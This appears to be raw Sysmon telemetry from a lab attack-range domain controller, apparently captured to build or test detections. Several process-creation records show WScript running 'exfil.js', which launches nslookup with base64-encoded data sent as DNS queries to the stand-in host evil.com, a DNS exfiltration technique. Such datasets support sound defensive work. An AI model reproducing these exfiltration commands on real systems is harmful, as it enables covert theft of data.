14:16:10.156{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-303E-000000005F02}8096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-17A1-629A-783D-000000005F02}55525884C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-303E-000000005F02}8096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.162{2E1864BB-17AA-629A-303E-000000005F02}8096C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlibiw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.156{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0449AA542E3B4662C1FD74D56A3EFEC,SHA256=F811A428B414024BA09E6C17AD824B6BFF0EDAD9503155D06B60A4C6C5EB7764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.141{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhskaa.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.109{2E1864BB-17AA-629A-2E3E-000000005F02}26323140C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-2F3E-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.109{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.109{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.109{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.108{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.108{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-2F3E-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.108{2E1864BB-17AA-629A-2D3E-000000005F02}3616488C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-2F3E-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.108{2E1864BB-17AA-629A-2F3E-000000005F02}7260C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-2D3E-000000005F02}3616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhskaa.tmp 2>&1 10341000x8000000000000000195227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.088{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-2E3E-000000005F02}2632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.088{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-2E3E-000000005F02}2632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.072{2E1864BB-17AA-629A-2E3E-000000005F02}26323140C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-2D3E-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-2E3E-000000005F02}2632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-2D3E-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-17A1-629A-783D-000000005F02}55527320C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-2D3E-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.065{2E1864BB-17AA-629A-2D3E-000000005F02}3616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhskaa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.056{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltoi.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-17A9-629A-2B3E-000000005F02}51842252C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-2C3E-000000005F02}7832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 